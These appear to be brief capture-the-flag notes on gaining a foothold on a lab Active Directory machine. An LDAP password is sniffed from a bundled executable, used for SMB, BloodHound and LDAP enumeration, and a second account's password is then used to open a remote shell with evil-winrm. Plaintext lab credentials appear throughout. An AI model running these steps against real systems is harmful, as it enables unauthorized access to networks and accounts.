Foothold

unzip UserInfo.exe.zip

Dotnet framework installed means I can run executables

Open wireshark and listen on tun0. The LDAP query will be sent in plain text

support\ldap.$nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

$ netexec smb 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

netexec smb 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --shares

$ smbclient  "\\\\10.10.11.174\\SYSVOL" -U ldap%'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

$ sudo bloodhound-python -d support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -ns 10.10.11.174 -c all

Didnt get much from bloodhound

ldapsearch -H ldap://support.htb -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' > ldap.out

support:Ironside47pleasure40Watchful

netexec winrm support -u support -p 'Ironside47pleasure40Watchful'

evil-winrm -i support -u support -p 'Ironside47pleasure40Watchful'

Last updated 1 year ago